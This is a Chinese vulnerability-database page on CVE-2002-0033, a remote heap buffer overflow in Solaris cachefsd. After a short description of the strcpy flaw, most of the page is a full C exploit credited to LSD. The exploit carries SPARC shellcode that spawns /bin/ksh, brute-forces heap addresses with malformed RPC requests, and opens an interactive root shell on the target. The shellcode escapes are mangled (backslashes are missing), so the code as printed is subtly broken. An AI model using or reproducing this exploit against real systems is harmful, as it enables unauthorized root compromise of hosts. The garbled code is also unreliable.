Sun Solaris cachefsd远程堆缓冲区溢出漏洞

Sun Solaris cachefsd远程堆缓冲区溢出漏洞

漏洞ID 1106553 漏洞类型 边界条件错误
发布时间 2002-01-01 更新时间 2005-08-17
图片[1]-Sun Solaris cachefsd远程堆缓冲区溢出漏洞-安全小百科CVE编号 CVE-2002-0033
图片[2]-Sun Solaris cachefsd远程堆缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-200205-079
漏洞平台 Solaris CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/21437
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200205-079
|漏洞详情
SunSolaris2.5.1、2.6、7和8缺省自带和安装了cachefsd程序,它用来对通过NFSmount的远程文件系统的操作请求进行缓存。在Solaris系统下,cachefsd服务以RPC服务形式被安装,号码为100235。Solariscachefsd程序中存在一个可远程利用的堆缓冲区溢出漏洞。远程或本地攻击者可以向cachefsd程序发送一个畸形RPC请求来获取root权限。cachefsd的第五个RCP服务函数:cachefsd_fs_mounted_1_svc()需要客户端提供两个字符串参数,一个是cachedir(这个表示要mount的目录名),一个是cachename(cache名)。cachefsd_fs_mounted_1_svc()会调用subr_add_mount()来增加远程mount点,subr_add_mount()又调用cfsd_fscache_create()函数来将这两个参数保存在一个fscache结构中(这个结构由函数cfsd_calloc()动态分配),然而,在保存参数时程序没有进行边界检查,而是直接调用strcpy()函数进行拷贝操作。如果攻击者提供超长的参数,就可能发生堆溢出,动态内存边界处的内存分配管理结构就会被覆盖,攻击者可能改变程序流程执行任意代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/4674/info

A remotely exploitable buffer overflow condition has been reported in cachefsd. The overflow occurs in the heap and is reportedly exploitable as valid malloc() chunk structures are overwritten. Successful attacks may result in remote attackers gaining root access on the affected system. 

/*## copyright LAST STAGE OF DELIRIUM jan 2002 poland        *://lsd-pl.net/ #*/
/*## cachefsd                                                                #*/

/* this code was tested on sun4u and sun4m architecture for Solaris 6/7.      */
/* due to large data transfers of about 100KB and the use of some brute       */
/* force technique the code may need some time to proceed.                    */
/* for older sparc architectures try using the -m option.                     */
/* in case the exploit fails after passing all cycles of the brute force loop */
/* try to use the -b option.                                                  */


#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <rpc/rpc.h>
#include <netdb.h>
#include <stdio.h>
#include <errno.h>

#define CACHEFS_PROG 100235
#define CACHEFS_VERS 1
#define CACHEFS_MOUNTED 5

#define NOPNUM  60

char shellcode[]=
    "x20xbfxffxff"     /* bn,a    <shellcode-4>          */
    "x20xbfxffxff"     /* bn,a    <shellcode>            */
    "x7fxffxffxff"     /* call    <shellcode+4>          */
    "x90x03xe0x20"     /* add     %o7,32,%o0             */
    "x92x02x20x10"     /* add     %o0,16,%o1             */
    "xc0x22x20x08"     /* st      %g0,[%o0+8]            */
    "xd0x22x20x10"     /* st      %o0,[%o0+16]           */
    "xc0x22x20x14"     /* st      %g0,[%o0+20]           */
    "x82x10x20x0b"     /* mov     0x0b,%g1               */
    "x91xd0x20x08"     /* ta      8                      */
    "/bin/ksh"
;

char findsckcode[]=
    "x20xbfxffxff"     /* bn,a    <findsckcode-4>        */
    "x20xbfxffxff"     /* bn,a    <findsckcode>          */
    "x7fxffxffxff"     /* call    <findsckcode+4>        */
    "x33x02x12x34"
    "xa0x10x20xff"     /* mov     0xff,%l0               */
    "xa2x10x20x54"     /* mov     0x54,%l1               */
    "xa4x03xffxd0"     /* add     %o7,-48,%l2            */
    "xaax03xe0x28"     /* add     %o7,40,%l5             */
    "x81xc5x60x08"     /* jmp     %l5+8                  */
    "xc0x2bxe0x04"     /* stb     %g0,[%o7+4]            */
    "xe6x03xffxd0"     /* ld      [%o7-48],%l3           */
    "xe8x03xe0x04"     /* ld      [%o7+4],%l4            */
    "xa8xa4xc0x14"     /* subcc   %l3,%l4,%l4            */
    "x02xbfxffxfb"     /* bz      <findsckcode+32>       */
    "xaax03xe0x5c"     /* add     %o7,92,%l5             */
    "xe2x23xffxc4"     /* st      %l1,[%o7-60]           */
    "xe2x23xffxc8"     /* st      %l1,[%o7-56]           */
    "xe4x23xffxcc"     /* st      %l2,[%o7-52]           */
    "x90x04x20x01"     /* add     %l0,1,%o0              */
    "xa7x2cx60x08"     /* sll     %l1,8,%l3              */
    "x92x14xe0x91"     /* or      %l3,0x91,%o1           */
    "x94x03xffxc4"     /* add     %o7,-60,%o2            */
    "x82x10x20x36"     /* mov     0x36,%g1               */
    "x91xd0x20x08"     /* ta      8                      */
    "x1axbfxffxf1"     /* bcc     <findsckcode+36>       */
    "xa0xa4x20x01"     /* deccc   %l0                    */
    "x12xbfxffxf5"     /* bne     <findsckcode+60>       */
    "xa6x10x20x03"     /* mov     0x03,%l3               */
    "x90x04x20x02"     /* add     %l0,2,%o0              */
    "x92x10x20x09"     /* mov     0x09,%o1               */
    "x94x04xffxff"     /* add     %l3,-1,%o2             */
    "x82x10x20x3e"     /* mov     0x3e,%g1               */
    "xa6x84xffxff"     /* addcc   %l3,-1,%l3             */
    "x12xbfxffxfb"     /* bne     <findsckcode+112>      */
    "x91xd0x20x08"     /* ta      8                      */
;

static char nop[]="x80x1cx40x11";

typedef struct{char *dir;char *cache;}req_t;

bool_t xdr_req(XDR *xdrs,req_t *objp){
    if(!xdr_string(xdrs,&objp->dir,~0)) return(FALSE);
    if(!xdr_string(xdrs,&objp->cache,~0)) return(FALSE);
    return(TRUE);
}

int tab[]={
    0x11111111,0x11111111,0xffffffff,0x00000000,
    0xffffffff,0xffffffff,0xffffffff,0xffffffff,
    0xffffffff,0x00000000,0x22222222,0x22222222
};

main(int argc,char **argv){
    char buffer[100000],*b;
    int i,j,c,n,address,offset=0,ofs=0,port=0,sck,flag=0,mflag=0,vers=-1;
    CLIENT *cl;enum clnt_stat stat;
    struct hostent *hp;
    struct sockaddr_in adr;
    struct timeval tm={10,0};
    req_t req;

    printf("copyright LAST STAGE OF DELIRIUM jan 2002 poland  //lsd-pl.net/n");
    printf("cachefsd for solaris 2.6 2.7 sparcnn");

    if(argc<2){
        printf("usage: %s address [-p port] [-o ofs] -v 6|7 [-b] [-m]n",argv[0]);
        exit(-1);
    }

    while((c=getopt(argc-1,&argv[1],"p:o:v:bm"))!=-1){
        switch(c){
        case 'p': port=atoi(optarg);break;
        case 'o': offset=atoi(optarg);break;
        case 'v': vers=atoi(optarg);break;
        case 'b': flag=1;break;
	case 'm': mflag=1;
        }
    }

    switch(vers){
    case 6: address=0xefffeb20;break;
    case 7: case 8: address=0xffbee998;break;
    default: exit(-1);
    }
    if(mflag) address=0xeffffa1c;
    for(j=0;j<512;j++){
        tab[0]=tab[1]=htonl(0xfffffffe);
        tab[3]=htonl(address+offset+ofs+((flag)?80:0));
        tab[9]=htonl(address+offset+ofs+((mflag)?-4136:4228));

        if(!j){
            printf("ret=0x%08x adr=0x%08x ofs=%d timeout=%dn",
	        ntohl(tab[9]),ntohl(tab[3]),offset,
	        tm.tv_sec);
        }

        adr.sin_family=AF_INET;
        adr.sin_port=htons(port);
        if((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1){
            if((hp=gethostbyname(argv[1]))==NULL){
	        errno=EADDRNOTAVAIL;perror("nerror");exit(-1);
            }
            memcpy(&adr.sin_addr.s_addr,hp->h_addr,4);
        }
  
        sck=RPC_ANYSOCK;
        if(!(cl=clnttcp_create(&adr,CACHEFS_PROG,CACHEFS_VERS,&sck,0,0))){
            clnt_pcreateerror("nclnttcp_create error");exit(-1);
        }
        cl->cl_auth=authunix_create("localhost",0,0,0,NULL);

        memset(buffer,0xff,60000);
        buffer[60000]=0;

        req.dir=buffer;
        req.cache="lsd";

        stat=clnt_call(cl,CACHEFS_MOUNTED,xdr_req,(void*)&req,xdr_void,NULL,tm);
        if(stat!=RPC_SUCCESS) {clnt_perror(cl,"nerror");exit(-1);}

        i=sizeof(struct sockaddr_in);
        if(getsockname(sck,(struct sockaddr*)&adr,&i)==-1){
            struct{unsigned int maxlen;unsigned int len;char *buf;}nb;
            ioctl(sck,(('S'<<8)|2),"sockmod");
            nb.maxlen=0xffff;
            nb.len=sizeof(struct sockaddr_in);
            nb.buf=(char*)&adr;
            ioctl(sck,(('T'<<8)|144),&nb);
        }
        n=ntohs(adr.sin_port);

        findsckcode[14+0]=(unsigned char)((n>>8)&0xff);
        findsckcode[14+1]=(unsigned char)(n&0xff);

        memset(buffer,0x41,14000);
        b=buffer; 
        for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
        for(i=0;i<strlen(findsckcode);i++) *b++=findsckcode[i];
        for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
        memcpy(&buffer[13920],tab,40);
        buffer[14000]=0;

        req.dir="/var/lp";
        req.cache=buffer;
        stat=clnt_call(cl,CACHEFS_MOUNTED,xdr_req,(void*)&req,xdr_void,NULL,tm);
        if(stat!=RPC_SUCCESS) {clnt_perror(cl,"nerror");exit(-1);}
        stat=clnt_call(cl,CACHEFS_MOUNTED,xdr_req,(void*)&req,xdr_void,NULL,tm);
        if((stat==RPC_SUCCESS)||(stat==RPC_CANTRECV)){
            clnt_destroy(cl);close(sck);
            ofs=(j%2)?(-((j>>1)+1)*4):(((j>>1)+1)*4);
	    printf(".");fflush(stdout);
        }else break;
    }

    printf("OK! adr=0x%08xn",ntohl(tab[3]));
    write(sck,"/bin/uname -an",14);
    while(1){
        fd_set fds;
        FD_ZERO(&fds);
        FD_SET(0,&fds);
        FD_SET(sck,&fds);
        if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){
	    int cnt;
	    char buf[1024];
	    if(FD_ISSET(0,&fds)){
                if((cnt=read(0,buf,1024))<1){
	            if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
	            else break;
                }
	        write(sck,buf,cnt);
            }
            if(FD_ISSET(sck,&fds)){
                if((cnt=read(sck,buf,1024))<1){
	            if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
	            else break;
                }
                write(1,buf,cnt);
            }
        }
    }
}
|参考资料

来源:CERT/CCAdvisory:CA-2002-11
名称:CA-2002-11
链接:http://www.cert.org/advisories/CA-2002-11.html
来源:US-CERTVulnerabilityNote:VU#635811
名称:VU#635811
链接:http://www.kb.cert.org/vuls/id/635811
来源:sunsolve.sun.com
链接:http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F44309
来源:BUGTRAQ
名称:20020505[LSD]Solariscachefsdremotebufferoverflowvulnerability
链接:http://archives.neohapsis.com/archives/bugtraq/2002-05/0026.html
来源:BID
名称:4674
链接:http://www.securityfocus.com/bid/4674
来源:XF
名称:solaris-cachefsd-name-bo(8999)
链接:http://www.iss.net/security_center/static/8999.php
来源:USGovernmentResource:oval:org.mitre.oval:def:31
名称:oval:org.mitre.oval:def:31
链接:http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:31
来源:USGovernmentResource:oval:org.mitre.oval:def:124
名称:oval:org.mitre.oval:def:124
链接:http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:124

相关推荐: WinGate telnet proxy服务拒绝漏洞

WinGate telnet proxy服务拒绝漏洞 漏洞ID 1207399 漏洞类型 未知 发布时间 1998-02-21 更新时间 1998-02-21 CVE编号 CVE-1999-0290 CNNVD-ID CNNVD-199802-015 漏洞平台…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享